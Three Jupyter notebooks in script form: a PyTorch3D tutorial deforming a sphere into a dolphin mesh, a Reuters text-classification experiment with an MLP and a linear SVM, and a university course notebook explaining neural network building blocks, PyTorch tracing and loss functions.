Install and Import modules # - # If `torch`, `torchvision` and `pytorch3d` are not installed, run the following cell: # + colab={} colab_type="code" id="_qkuyhyTeRyM" # !pip install torch torchvision # !pip install 'git+https://github.com/facebookresearch/pytorch3d.git@stable' # + colab={} colab_type="code" id="ylbZGXYBtuvB" import os import torch from pytorch3d.io import load_obj, save_obj from pytorch3d.structures import Meshes from pytorch3d.utils import ico_sphere from pytorch3d.ops import sample_points_from_meshes from pytorch3d.loss import ( chamfer_distance, mesh_edge_loss, mesh_laplacian_smoothing, mesh_normal_consistency, ) import numpy as np from tqdm import tqdm_notebook # %matplotlib notebook from mpl_toolkits.mplot3d import Axes3D import matplotlib.pyplot as plt import matplotlib as mpl mpl.rcParams['savefig.dpi'] = 80 mpl.rcParams['figure.dpi'] = 80 # Set the device device = torch.device("cuda:0") # + [markdown] colab_type="text" id="yT1JTXu1WHQ_" # ## 1. Load an obj file and create a Meshes object # - # Download the target 3D model of a dolphin. It will be saved locally as a file called `dolphin.obj`. # + colab={"base_uri": "https://localhost:8080/", "height": 204} colab_type="code" id="oFNkB6nQWZSw" outputId="c1bbe6e2-a4ea-4113-d53d-1cb1ece130f1" # !wget https://dl.fbaipublicfiles.com/pytorch3d/data/dolphin/dolphin.obj # + colab={} colab_type="code" id="dz0imH-ltuvS" # Load the dolphin mesh. trg_obj = os.path.join('dolphin.obj') # + colab={} colab_type="code" id="rbyRhI8ituvW" # We read the target 3D model using load_obj verts, faces, aux = load_obj(trg_obj) # verts is a FloatTensor of shape (V, 3) where V is the number of vertices in the mesh # faces is an object which contains the following LongTensors: verts_idx, normals_idx and textures_idx # For this tutorial, normals and textures are ignored. 
faces_idx = faces.verts_idx.to(device) verts = verts.to(device) # We scale normalize and center the target mesh to fit in a sphere of radius 1 centered at (0,0,0). # (scale, center) will be used to bring the predicted mesh to its original center and scale # Note that normalizing the target mesh, speeds up the optimization but is not necessary! center = verts.mean(0) verts = verts - center scale = max(verts.abs().max(0)[0]) verts = verts / scale # We construct a Meshes structure for the target mesh trg_mesh = Meshes(verts=[verts], faces=[faces_idx]) # + colab={} colab_type="code" id="6BxDTpB2WHRH" # We initialize the source shape to be a sphere of radius 1 src_mesh = ico_sphere(4, device) # + [markdown] colab_type="text" id="dYWDl4VGWHRK" # ### Visualize the source and target meshes # + colab={} colab_type="code" id="482YycLHWHRL" def plot_pointcloud(mesh, title=""): # Sample points uniformly from the surface of the mesh. points = sample_points_from_meshes(mesh, 5000) x, y, z = points.clone().detach().cpu().squeeze().unbind(1) fig = plt.figure(figsize=(5, 5)) ax = Axes3D(fig) ax.scatter3D(x, z, -y) ax.set_xlabel('x') ax.set_ylabel('z') ax.set_zlabel('y') ax.set_title(title) ax.view_init(190, 30) plt.show() # + colab={"base_uri": "https://localhost:8080/", "height": 765} colab_type="code" id="UoGcflJ_WHRO" outputId="b9a2d699-2c68-4696-9dff-d30eea7a0fb0" # # %matplotlib notebook plot_pointcloud(trg_mesh, "Target mesh") plot_pointcloud(src_mesh, "Source mesh") # + [markdown] colab_type="text" id="8uzMiTUSWHRS" # ## 3. 
Optimization loop # + colab={} colab_type="code" id="Sc-3M17Ltuvh" # We will learn to deform the source mesh by offsetting its vertices # The shape of the deform parameters is equal to the total number of vertices in src_mesh deform_verts = torch.full(src_mesh.verts_packed().shape, 0.0, device=device, requires_grad=True) # + colab={} colab_type="code" id="0BtSUfMYtuvl" # The optimizer optimizer = torch.optim.SGD([deform_verts], lr=1.0, momentum=0.9) # + colab={"base_uri": "https://localhost:8080/", "height": 1000, "referenced_widgets": ["12fdcbc799cc4da899d889d0399616c2", "0bd231c2134e4127a3756807317d6aae", "<KEY>", "be25dd06faf04bf29733cc16deefb189", "283601ac2fe54ecc8716aed8842a5dd2", "6e2ff75105a74afbb4ed3fafd414e16f", "5462de8f68be408d98a6a495e630f448", "<KEY>"]} colab_type="code" id="9DAjqI9Atuvp" outputId="d59e959b-8616-40fe-aec4-5b09b27e325f" # Number of optimization steps Niter = 2000 # Weight for the chamfer loss w_chamfer = 1.0 # Weight for mesh edge loss w_edge = 1.0 # Weight for mesh normal consistency w_normal = 0.01 # Weight for mesh laplacian smoothing w_laplacian = 0.1 # Plot period for the losses plot_period = 250 loop = tqdm_notebook(range(Niter)) chamfer_losses = [] laplacian_losses = [] edge_losses = [] normal_losses = [] # %matplotlib inline for i in loop: # Initialize optimizer optimizer.zero_grad() # Deform the mesh new_src_mesh = src_mesh.offset_verts(deform_verts) # We sample 5k points from the surface of each mesh sample_trg = sample_points_from_meshes(trg_mesh, 5000) sample_src = sample_points_from_meshes(new_src_mesh, 5000) # We compare the two sets of pointclouds by computing (a) the chamfer loss loss_chamfer, _ = chamfer_distance(sample_trg, sample_src) # and (b) the edge length of the predicted mesh loss_edge = mesh_edge_loss(new_src_mesh) # mesh normal consistency loss_normal = mesh_normal_consistency(new_src_mesh) # mesh laplacian smoothing loss_laplacian = mesh_laplacian_smoothing(new_src_mesh, method="uniform") # Weighted sum of 
the losses loss = loss_chamfer * w_chamfer + loss_edge * w_edge + loss_normal * w_normal + loss_laplacian * w_laplacian # Print the losses loop.set_description('total_loss = %.6f' % loss) # Save the losses for plotting chamfer_losses.append(loss_chamfer) edge_losses.append(loss_edge) normal_losses.append(loss_normal) laplacian_losses.append(loss_laplacian) # Plot mesh if i % plot_period == 0: plot_pointcloud(new_src_mesh, title="iter: %d" % i) # Optimization step loss.backward() optimizer.step() # + [markdown] colab_type="text" id="VGcZsvWBWHRc" # ## 4. Visualize the loss # + colab={"base_uri": "https://localhost:8080/", "height": 374} colab_type="code" id="baXvAo1yWHRd" outputId="11ebe2ad-4352-4492-bd67-e6a3c95adc85" fig = plt.figure(figsize=(13, 5)) ax = fig.gca() ax.plot(chamfer_losses, label="chamfer loss") ax.plot(edge_losses, label="edge loss") ax.plot(normal_losses, label="normal loss") ax.plot(laplacian_losses, label="laplacian loss") ax.legend(fontsize="16") ax.set_xlabel("Iteration", fontsize="16") ax.set_ylabel("Loss", fontsize="16") ax.set_title("Loss vs iterations", fontsize="16") # + [markdown] colab_type="text" id="Y9vSKErDWHRg" # ## 5. Save the predicted mesh # + colab={} colab_type="code" id="krikJzrLtuvw" # Fetch the verts and faces of the final predicted mesh final_verts, final_faces = new_src_mesh.get_mesh_verts_faces(0) # Scale normalize back to the original target size final_verts = final_verts * scale + center # Store the predicted mesh using save_obj final_obj = os.path.join('./', 'final_model.obj') save_obj(final_obj, final_verts, final_faces) # + [markdown] colab_type="text" id="quR1DVAcWHRk" # ## 6. Conclusion # # In this tutorial we learnt how to load a mesh from an obj file, initialize a PyTorch3D datastructure called **Meshes**, set up an optimization loop and use four different PyTorch3D mesh loss functions.
docs/tutorials/deform_source_mesh_to_target_mesh.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # %config InlineBackend.figure_format = 'retina' # + # %load_ext autoreload # %autoreload 1 # + import numpy as np import pandas as pd import pickle from pathlib import Path # - # # Load data # + data_root = Path.home() / "data" / "tmp" reuters_dir = data_root / "reuters21578" reuters_corpus_path = reuters_dir / "corpus.pkl" reuters = pickle.load(open(reuters_corpus_path, "rb")) top_ten_ids, top_ten_names = reuters.top_n(n=10) cache_dir = reuters_dir / "cache" # - # # Build dataframe train_docs, test_docs = reuters.split_modapte() docs = train_docs + test_docs train_labels = reuters.get_labels(train_docs, set(top_ten_ids)) test_labels = reuters.get_labels(test_docs, set(top_ten_ids)) from ds_tutorial.datasets import build_reuters_dataframe df, top_ten_ids, train_labels, test_labels = build_reuters_dataframe( docs, reuters.topics, train_labels, test_labels, top_ten_ids) df.head() # # Build feature extraction pipeline # + from sklearn.pipeline import Pipeline from sklearn.pipeline import FeatureUnion from sklearn.preprocessing import Imputer from sklearn.preprocessing import StandardScaler from sklearn.decomposition import TruncatedSVD from sklearn.metrics import classification_report from sklearn.feature_extraction import DictVectorizer from sklearn.base import BaseEstimator, TransformerMixin from sklearn.feature_extraction.text import TfidfVectorizer from sklearn.svm import LinearSVC # - from ds_tutorial.transformers import TextFromColumns, TextStats, ColumnSelector, TextFromColumns2 df_train = df.query("modapte == 'train'") df_test = df.query("modapte == 'test'") y_train = df_train.label.values y_test = df_test.label.values pipeline = Pipeline(memory=str(cache_dir), steps=[ ("union", FeatureUnion(transformer_list=[ ("title_stats", Pipeline([ 
("column", ColumnSelector("title")), ("stats", TextStats()), ("scaled", StandardScaler()), ])), ("body_stats", Pipeline([ ("column", ColumnSelector("body")), ("stats", TextStats()), ("scaled", StandardScaler()), ])), ("combined_text", Pipeline([ ("column", TextFromColumns(columns=["title", "body"])), #("tfidf", TfidfVectorizer(analyzer="char_wb", ngram_range=(1, 5))), ("tfidf", TfidfVectorizer()), #("best", TruncatedSVD(n_components=300, random_state=2018)) ])), ])), ]) X_train = pipeline.fit_transform(df_train) X_test = pipeline.transform(df_test) # ## Build multi layer perceptron from tensorflow.python.keras.optimizers import Adam from tensorflow.python.keras import models from tensorflow.python.keras.layers import Dense from tensorflow.python.keras.layers import Dropout def mlp_model(layers, units, dropout_rate, input_shape, num_classes): model = models.Sequential() model.add(Dropout(rate=dropout_rate, input_shape=input_shape)) for _ in range(layers-1): model.add(Dense(units=units, activation='relu')) model.add(Dropout(rate=dropout_rate)) model.add(Dense(units=num_classes, activation="softmax")) return model model = mlp_model(3, 32, 0.2, X_train.shape[1:], 75) optimizer = Adam(lr=1e-3) model.compile(optimizer=optimizer, loss="sparse_categorical_crossentropy", metrics=['acc']) history = model.fit(X_train, y_train, epochs=15) y_pred = model.predict_classes(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3)) y_pred = model.predict_classes(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3)) y_pred = model.predict_classes(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3)) # %%time model = LinearSVC() model.fit(X_train, y_train) y_pred = model.predict(X_test) print(classification_report(y_test, y_pred, target_names=top_ten_names, labels=top_ten_ids, digits=3))
notebooks/text_classification/mlp.ipynb
# --- # jupyter: # jupytext: # text_representation: # extension: .py # format_name: light # format_version: '1.5' # jupytext_version: 1.14.4 # kernelspec: # display_name: Python 3 # language: python # name: python3 # --- # # Machine Learning and Statistics for Physicists # Material for a [UC Irvine](https://uci.edu/) course offered by the [Department of Physics and Astronomy](https://www.physics.uci.edu/). # # Content is maintained on [github](github.com/dkirkby/MachineLearningStatistics) and distributed under a [BSD3 license](https://opensource.org/licenses/BSD-3-Clause). # # [Table of contents](Contents.ipynb) # %matplotlib inline import matplotlib.pyplot as plt import seaborn as sns; sns.set() import numpy as np import pandas as pd from mls import nn_unit_draw2d, nn_graph_draw2d import torch.nn import mls.torch # ## Neural Networks # From a user's perspective, a neural network (NN) is a class of models $X_\text{out} = N(X_\text{in}; \Theta)$ that are: # - **Generic:** they are not tailored to any particular application. # - **Flexible:** they can accurately represent a wide range of non-linear $X_\text{in}\rightarrow X_\text{out}$ mappings with a suitable choice of parameters $\Theta$. # - **Trainable:** a robust optimization algorithm (backpropagation) can learn parameters $\Theta$ given enough training data $D = (X_\text{in},Y_\text{tgt})$. # - **Modular:** it is straightforward to scale the model complexity (and number of parameters) to match the available training data. # - **Efficient:** most of the internal computations are linear and amenable to parallel computation and hardware acceleration. # # The "neural" aspect of a NN is tenuous. Their design mimics some aspects of biological neurons, but also differs in fundamental ways. # # In this notebook, we will explore NNs from several different perspectives: # - **Mathematical:** What equations describe a network? # - **Visual:** What does the network graph look like? 
How is the input space mapped through the network? # - **Data Flow:** What are the tensors that parameterize and flow (forwards and backwards) through a network? # - **Statistical:** What are typical distributions of tensor values? # ### Mathematical Perspective # #### Building Block # # The internal structure of a NN is naturally described by a computation graph that connects simple building blocks. The basic building-block unit is a function of $D$ input features $x_i$, # $$ # f(\mathbf{x}) = \phi\left(\mathbf{x}\cdot\mathbf{w} + b\right) # $$ # with $D+1$ parameters consisting of $D$ **weights** $w_i$ and a single **bias** $b$. The corresponding [graph](http://alexlenail.me/NN-SVG/index.html) (with $D=8$) is: # # ![NN unit](img/NeuralNetworks/nn_unit.png) # # where the left nodes correspond to the elements of the input $\mathbf{x}$, the edges correspond to the elements of $\mathbf{w}$ (thickness ~ strength, red/blue are pos/neg values), and the right node is the output value $f(\mathbf{x})$. The recipe for obtaining the output value is then: # - propagate each input value $x_i$ with a strength $w_i$, # - sum the values $x_i w_i$, # - apply the activation $\phi$. # # Note that this building block is mostly linear, except for the **activation function** $\phi(s)$. This is an application of the kernel trick covered in the [Nonlinear notebook](Nonlinear.ipynb), and allows us to implicitly work in a higher dimensional space where non-linear structure in data is easier to model. 
# # The building-block equation is straightfoward to implement as code: def nn_unit(x, w, b, phi): return phi(np.dot(x, w) + b) # For example, with a 3D input $\mathbf{x}$, the weight vector $\mathbf{w}$ should also be 3D: nn_unit(x=[0, 1, -1], w=[1, 2, 3], b=-1, phi=np.tanh) # #### Activation Functions # # The activation function $\phi$ argument $s$ is always a scalar and, by convention, activation functions are always defined in a standard form, without any parameters (since $\mathbf{w}$ and $b$ already provide enough learning flexibility). # # Some popular activations are defined below (using [lambda functions](https://docs.python.org/3/tutorial/controlflow.html#lambda-expressions)). For the full list supported in PyTorch see [here](https://pytorch.org/docs/stable/nn.html#non-linear-activations-weighted-sum-nonlinearity). relu = lambda s: np.maximum(0, s) elu = lambda s: np.maximum(0, s) + np.minimum(0, np.expm1(s)) # expm1(s) = exp(s) - 1 softplus = lambda s: np.log(1 + np.exp(s)) sigmoid = lambda s: 1 / (1 + np.exp(-s)) # also known as the "logistic function" tanh = lambda s: np.tanh(s) softsign = lambda s: s / (np.abs(s) + 1) # These activations divide naturally into two categories depending on their asymptotic behavior as $s\rightarrow +\infty$: # + def plot_activations(ax, names, s_range=5, y_range=2): s = np.linspace(-s_range, +s_range, 101) for name in names.split(','): phi = eval(name) ax.plot(s, phi(s), lw=4, alpha=0.5, label=name) ax.legend(fontsize='x-large') ax.set_xlabel('Activation input $s$') ax.set_ylabel('Activation output $\phi(s)$') ax.set_xlim(-s_range, +s_range) ax.set_ylim(-y_range, +y_range) ax.axhline(-1, c='gray', ls=':') ax.axhline(+1, c='gray', ls=':') _, ax = plt.subplots(1, 2, figsize=(12, 5)) plot_activations(ax[0], 'relu,elu,softplus') plot_activations(ax[1], 'sigmoid,tanh,softsign') plt.tight_layout() # - # Note that all activations saturate (at -1 or 0) for $s\rightarrow -\infty$, but differ in their behavior when $s\rightarrow 
+\infty$ (linear vs saturate at +1). # + [markdown] solution2="hidden" solution2_first=true # **DISCUSS:** # - Which activation would you expect to be the fastest to compute? # - Which activations are better suited for a binary classification problem? # + [markdown] solution2="hidden" # The `relu` activation is the fastest to compute since it does not involve any transcendental function calls (exp, log, ...). # # The activations that are bounded on both sides only have a narrow range near $s=0$ where they distinguish between different input values, and otherwise are essentially saturated at one of two values. This is desirable for classification, where the aim is to place $s=0$ close to the "decision boundary" (by learning a suitable bias). # # --- # - # #### Network Layer # # What happens if we replace the vectors $\mathbf{x}$ and $\mathbf{w}$ above with matrices? # $$ # F(X) = \phi\left( X W + \mathbf{b}\right) # $$ # If $X$ has shape $(N, D)$ and holds $N$ samples of $D$ features, then $W$ must have shape $(D, M)$ so $F(X)$ converts the $D$ input features into $M$ output features for each sample. We say that $F$ represents a linear network **layer** with $D$ input nodes and $M$ output nodes. Note that the bias is now a vector of $M$ bias values, one for each output value. # # We cannot really add a vector $\mathbf{b}$ to the matrix $X W$ but we are using the "broadcasting" convention that this means add the same vector to each row (sample) of $X W$. We also cannot apply $\phi(s)$ to a matrix, but we are using the "elementwise" convention that this means apply $\phi$ separately to each element of the matrix. 
# # To connect this matrix version with our earlier vector version, notice that $F(X)$ transforms a single input sample $\mathbf{x}_i$ (row of $X$) into $M$ different outputs, $f_m(\mathbf{x}_i)$ each with their own weight vector and bias value: # $$ # f_m(\mathbf{x}_i) = \phi\left(\mathbf{x}_i\cdot \mathbf{w}_m + b_m\right) \; , # $$ # where $\mathbf{w}_m$ is the $m$-th column of $W$ and $b_m$ is the $m$-th element of $\mathbf{b}$. # # The corresponding graph (with $D=8$ and $M=4$) is: # # ![NN layer](img/NeuralNetworks/nn_layer.png) # # The `nn_unit` function we defined above already implements a layer if we pass it matrices $X$ and $W$ and a vector $\mathbf{b}$. For example: nn_unit(x=[[1., 0.5], [-1, 1]], w=[[1, -1, 1], [2, 0, 1]], b=[-1, 1, 0], phi=sigmoid) # A layer with $n_{in}$ inputs and $n_{out}$ outputs has a total of $(n_{in} + 1) n_{out}$ parameters. These can add up quickly when building useful networks! # #### Network Graph # # Finally, we can build a simple **fully connected graph** by stacking layers horizontally, which corresponds to nested calls of each layer's function. For example, with 3 layers computed by $F$, $G$, $H$ stacked (left to right), the overall graph computation is: # $$ # N(X) = H\left(G\left(F(X)\right)\right) \; , # $$ # with a corresponding graph: # # ![NN graph](img/NeuralNetworks/nn_graph.png) # # Nodes between the input (leftmost) and output (rightmost) nodes are known as **hidden nodes**. # # The corresponding code for arbitrary layers is: def nn_graph(X, *layers): for W, b, phi in layers: X = nn_unit(X, W, b, phi) return X # For example, here is a three-layer network with the same architecture as the graph above. Note how the output dimension of one layer must match the input dimension of the next layer. 
nn_graph([1, 2, 3, 4, 5, 6, 7, 8],
         ([
             [11, 12, 13, 14],
             [21, 22, 23, 24],
             [31, 32, 33, 34],
             [41, 42, 43, 44],
             [51, 52, 53, 54],
             [61, 62, 63, 64],
             [71, 72, 73, 74],
             [81, 82, 83, 84],
         ], [1, 2, 3, 4], tanh),   # LYR1: n_in=8, n_out=4
         ([
             [11, 12, 13],
             [21, 22, 23],
             [31, 32, 33],
             [41, 42, 43],
         ], [1, 2, 3], relu),      # LYR2: n_in=4, n_out=3
         ([
             [11, 12],
             [21, 22],
             [31, 32],
         ], [1, 2], sigmoid)       # LYR3: n_in=3, n_out=2
         )

# The weight and bias values are chosen to make the tensors easier to read, but would not make sense for a real network. As a result, the final output of `[1., 1.]` is not surprising given how the sigmoid activation saturates for input outside a narrow range.

# ### Visual Perspective

# ![Activation maps](img/NeuralNetworks/activation_maps.png)

# + [markdown] solution2="hidden" solution2_first=true
# **EXERCISE:** Identify which activation function was used to make each plot above, which shows the building block
# $$
# f(\mathbf{x}) = \phi\left(\mathbf{x}\cdot\mathbf{w} + b\right)
# $$
# for a 2D $\mathbf{x}$ with the same $\mathbf{w}$ and $b$ used in each plot. Red and blue indicate positive and negative values, respectively, with zero displayed as white. For calibration, (a) shows a "linear" activation which passes its input straight through.

# + [markdown] solution2="hidden"
# - (a) linear
# - (b) tanh
# - (c) relu
# - (d) softsign
# - (e) sigmoid
# - (f) elu
#
# To distinguish between (b) and (d), note that both go asymptotically to constant negative and positive values (so sigmoid is ruled out), but the white transition region is narrower for (d).
#
# To distinguish between (c) and (f), note that (c) goes asymptotically to zero (white) in the top-left corner, while (f) goes asymptotically to a constant negative value (blue).
# # --- # + [markdown] solution2="hidden" solution2_first=true # **EXERCISE:** Experiment with the following function to determine how the displayed arrow relates to the three model parameters $w_0, w_1, b$: # ``` # nn_unit_draw2d(w=[0, 2], b=-1, phi=tanh) # ``` # + [markdown] solution2="hidden" # The arrow has the direction and magnitude of the 2D vector $\mathbf{w}$, with its origin at $\mathbf{x} = -b \mathbf{w}\, / \, |\mathbf{w}|^2$ where $s = 0$. The line $s=0$ is perpendicular to the arrow. # + solution2="hidden" nn_unit_draw2d(w=[2, 1], b=+1, phi=tanh) # - # Study the plots below which show the hidden (left) and output (right) node values for a network with 2 + 2 + 1 nodes. Each graph shows the node value as a function of the 2D input value. # # Note how the hidden nodes divide the input space into two halves, with a dividing line determined by their $\mathbf{w}$ and $b$ values. The output layer then mixes these halves and can therefore "select" any of the four quadrants with an appropriate choice of its $\mathbf{w}$ and $b$. nn_graph_draw2d( ([[2, 0],[-1, -2]], [0, 0], tanh), # LYR1 ([[1], [-1]], [-1], tanh) # LYR2 ) # The histogram on the second layer plot shows the distribution of # $$ # s = X W + b # $$ # feeding its activation function (shown as the dashed curve). Note how the central histogram peak is higher because both the lower-right and upper-left quadrants of $(x_1, x_2)$ have $Y W \simeq 0$. The vertical white line shows how our choice of bias $b = -0.5$ places these quadrants in the "rejected" (blue) category with $s < 0$. # # Generalizing this example, a layer with $n$ inputs can "select" a different $n$-sided (soft-edged) polygon with each of its outputs. To see this in action, try [this demo](https://cs.stanford.edu/people/karpathy/convnetjs/demo/classify2d.html). # ### Data Flow Perspective # The diagram below show the tensors flowing forward (left to right) in a typical fully connected graph. 
The main flow consists of $N$ input samples flowing from $X_0$ to $X_4$ with a number of features that varies between layers: # $$ # X_{n+1} = \phi\left( X_n\cdot W_{n+1} + \mathbf{b}_{n+1}\right) \; . # $$ # # The computation of each layer's output is parameterized by the weight and bias tensors shown: note how their shapes are determined by the number of input and output features for each layer. The parameter tensors are usually randomly initialized (more on this soon) so only the input $X_0$ and target $Y$ are needed to drive the calculation (and so must be copied to GPU memory when using hardware acceleration). # # The final output $X_4$ is compared with the target values $Y$ to calculate a "loss" $\ell(X_4, Y)$ that decreases as $X_4$ becomes more similar to $Y$ (more on this soon). # # ![forward flow](img/NeuralNetworks/forward_flow.png) # # The diagram below shows the gradient (partial derivative) tensors flowing backwards ("backpropagation") through the same graph using the chain rule: # $$ # \frac{\partial \ell}{\partial X_n} = \frac{\partial \ell}{\partial X_{n+1}} \frac{\partial X_{n+1}}{\partial X_n} # \quad, \quad # \frac{\partial \ell}{\partial W_{n+1}} = \frac{\partial \ell}{\partial X_{n+1}} \frac{\partial X_{n+1}}{\partial W_{n+1}} \; . # $$ # # ![backward flow](img/NeuralNetworks/backward_flow.png) # # Note that these gradient tensors are just numbers, not functions. All of these tensors occupy the (limited) GPU memory when using hardware acceleration but, in most applications, only the final output and the parameter gradients are stored (with 32-bit floating point precision). # # When working with large datasets, the $N$ input samples are usually broken up into fixed-size randomly subsampled "minibatches". Optimiztion with the resulting parameter gradients leads to the "stochastic gradient descent" (SGD) algorithm. 
# ### PyTorch Primer # A fully connected network can be created with a few lines in PyTorch (for a similar high-level API in Tensorflow checkout [Keras](https://www.tensorflow.org/guide/keras)): # + torch.manual_seed(123) net = torch.nn.Sequential( torch.nn.Linear(8, 4), #0 torch.nn.ReLU(), #1 torch.nn.Linear(4, 3), #2 torch.nn.ReLU(), #3 torch.nn.Linear(3, 2) #4 ) # - # As each `Linear` layer is created, its weight and bias tensors are automatically initialized with random values, so we initially set the torch random seed for reproducible results. # # This construction breaks each layer into separate linear and activation "modules". Each module can be accessed via its index (0-4 in this example): print(net) net[2].weight net[4].bias # To run our network in the forward direction, we need some data with the expected number of features ($D=8$ in this example): N = 100 D = net[0].in_features Xin = torch.randn(N, D) Xout = net(Xin) # The intermediate tensors ($X_1$, $\partial\ell/\partial X_1$, ...) shown in the data flow diagrams above are usually not preserved, but can be useful to help understand how a network is performing and diagnose problems. 
To cache these intermediate tensors, use: mls.torch.trace(net) Xout = net(Xin) # Each submodule now has `input` and `output` attributes: torch.equal(Xin, net[0].input) torch.equal(net[0].output, net[1].input) # Use the `verbose` option to watch the flow of tensors through the network: mls.torch.trace(net, verbose=True) Xout = net(Xin) # To complete the computational graph we need to calculate a (scalar) loss, for example: loss = torch.mean(Xout ** 2) print(loss) # We can now back propagate gradients of this loss through the network: loss.backward() # The gradients of each layer's parameters are now computed and stored, ready to "learn" better parameters through (stochastic) gradient descent (or one of its variants): net[0].bias.grad # Using `mls.torch.trace` we have also captured the gradients of the loss with respect to each module's outputs $\partial\ell /\partial X_n$: net[0].output.size(), net[0].grad.size() # These gradients can be useful to study since learning of all upstream parameters effectively stops when they become vanishly small (since they multiply those parameter gradients via the chain rule). # ### Statistical Perspective # The tensors behind a practical network contain so many values that it is usually not practical to examine them individually. However, we can still gain useful insights if we study their probability distributions. # # Build a network to process a large dataset so we have some distributions to study: # + torch.manual_seed(123) N, D = 500, 100 Xin = torch.randn(N, D) net = torch.nn.Sequential( torch.nn.Linear(D, 2 * D), torch.nn.Tanh(), torch.nn.Linear(2 * D, D), torch.nn.ReLU(), torch.nn.Linear(D, 10) ) print(net) # - # Note that our network ends with a `Linear` module instead of an activation, which is typical for regression problems. 
# # Perform forward and backward passes to capture some values: mls.torch.trace(net, verbose=True) Xout = net(Xin) loss = torch.mean(Xout ** 2) loss.backward() # First check that the input to the first module has the expected (unit normal) distribution: plt.hist(net[0].input.reshape(-1), bins=50); # How does torch initialize the parameters (weights and biases) for each layer? plt.hist(net[0].weight.data.reshape(-1), bins=50); plt.hist(net[0].bias.data, bins=50); # These initial parameter values are sampled from uniform distributions centered on zero with a spread that depends on the number of inputs to the layer: # $$ # \left|W_{ij}\right|, \left|b_j\right| \le n_{in}^{-1/2} \; . # $$ # This default choice is based on [empirical studies](https://arxiv.org/abs/1502.01852) of image classification problems where the input features (RGB pixel values) were preprocessed to have zero mean and unit variance. # # With this choice of weights, the first `Linear` module mixes up its input values ($X_0$) but generally preserves Gaussian shape while slightly reducing its variance (which helps prevent the subsequent activation module from saturating): plt.hist(net[0].output.reshape(-1), bins=50); # A scatter plot of the the first `Tanh` activation function's input and output values just traces out the function since it is applied element wise. Note how most of input values do not saturate, which is generally desirable for efficient learning. plt.scatter(net[1].input.reshape(-1), net[1].output.reshape(-1), s=1); # The non-linear activation distorts and clips the output so it no longer resembles a Gaussian: plt.hist(net[1].output.reshape(-1), bins=50); # However, the next `Linear` module restores the Gaussian distribution! How does this happen when neither its inputs nor its parameters have a Gaussian distribution? 
(Answer: the [central limit theorem](https://en.wikipedia.org/wiki/Central_limit_theorem) which we briefly covered [earlier](https://nbviewer.jupyter.org/github/dkirkby/MachineLearningStatistics/blob/master/notebooks/Statistics.ipynb)). plt.hist(net[2].output.reshape(-1), bins=50); # The next activation is `ReLU`, which effectively piles up all negative values from the previous `Linear` module into the zero bin: plt.scatter(net[3].input.reshape(-1), net[3].output.reshape(-1), s=1); plt.hist(net[3].output.reshape(-1), bins=50); # The final linear layer's output is again roughly Gaussian, thanks to the central limit theorem: plt.hist(net[4].output.reshape(-1), bins=50); # So far we have only looked at distributions of the tensors involved in the forward pass, but there is also a lot to learn from the backwards gradient tensors that we do not have time to delve in to. For example, this scatter plot offers some insight into a suitable learning rate for the second `Linear` module's weight parameters: plt.scatter(net[2].weight.data.reshape(-1), net[2].weight.grad.reshape(-1), s=1); # Note that the normalization of the loss function feeds directly into these gradients, so needs to be considered when setting the learning rate: Xout = net(Xin) loss = 100 * torch.mean(Xout ** 2) loss.backward() plt.scatter(net[2].weight.data.reshape(-1), net[2].weight.grad.reshape(-1), s=1); # ### Loss Functions # In order discover a good set of parameters using optimization, we need to specify a loss function to optimize. # # The loss function $\ell(X_\text{out}, Y_\text{tgt})$ compares the actual network output $X_\text{out}$ with a corresponding target value $Y_\text{tgt}$ and approaches some minimum value as their agreement improves. # # A loss function must be scalar valued since we need a single gradient for each parameter to implement gradient descent, # $$ # \theta \rightarrow \theta - \eta\,\frac{\partial\ell}{\partial\theta} \; . 
# $$ # Note that the loss normalization is degenerate with the learning rate $\eta$. # # Our choice of loss function is primarily driven by the type of problem we are solving: regression or classification. We introduce the most obvious choices below but there are lots of reasonable variations (see [here](https://pytorch.org/docs/stable/nn.html#id51) for the complete PyTorch list). # #### Regression Loss # For regression, the $L_2$ norm is a popular choice, # $$ # L_2 = \frac{1}{2}\, \left| # X_\text{out} - Y_\text{tgt}\right|^2 \; . # $$ # Optimizing the $L_2$ norm is equivalent to finding the maximum-likelihood (ML) point estimate for the network parameters (weights and biases) if we assume that the uncertainties in $Y_\text{tgt}$ are "homoscedastic" (drawn from the same Gaussian distribution). # # In PyTorch, the $L_2$ norm is implemented as [torch.nn.MSELoss](https://pytorch.org/docs/stable/nn.html#mseloss): Y = torch.zeros_like(Xout) loss = torch.nn.MSELoss()(Xout, Y) # In case you actually have a reasonable estimate $\sigma_Y^i$ of the $i$-th sample's target uncertainty, a better loss function is the $\chi^2$ statistic: # $$ # \chi^2 = \sum_{i=1}^N\, \left( \frac{X_\text{out}^i - Y_\text{tgt}^i}{\sigma_Y^i}\right)^2 \; . # $$ # #### Binary Classification Loss # For binary classification problems, the L2 norm can also be used but the binary [cross entropy](https://en.wikipedia.org/wiki/Cross_entropy) between the target and output probability distributions is often a better choice: # $$ # \text{BCE} \equiv -\sum_{i=1}^N\, \left[ # Y_{tgt}^i \log \phi_S(X_\text{out}^i) + (1 - Y_\text{tgt}^i) \log (1 - \phi_S(X_\text{out}^i)) \right] # $$ # where $\phi_S$ is the sigmoid (aka logistic) activation function used to coerce arbitrary real values into the range $[0,1]$ required for a probability. The value $X_\text{out}^i$ feeding a sigmoid like this is known as a [logit](https://en.wikipedia.org/wiki/Logit). 
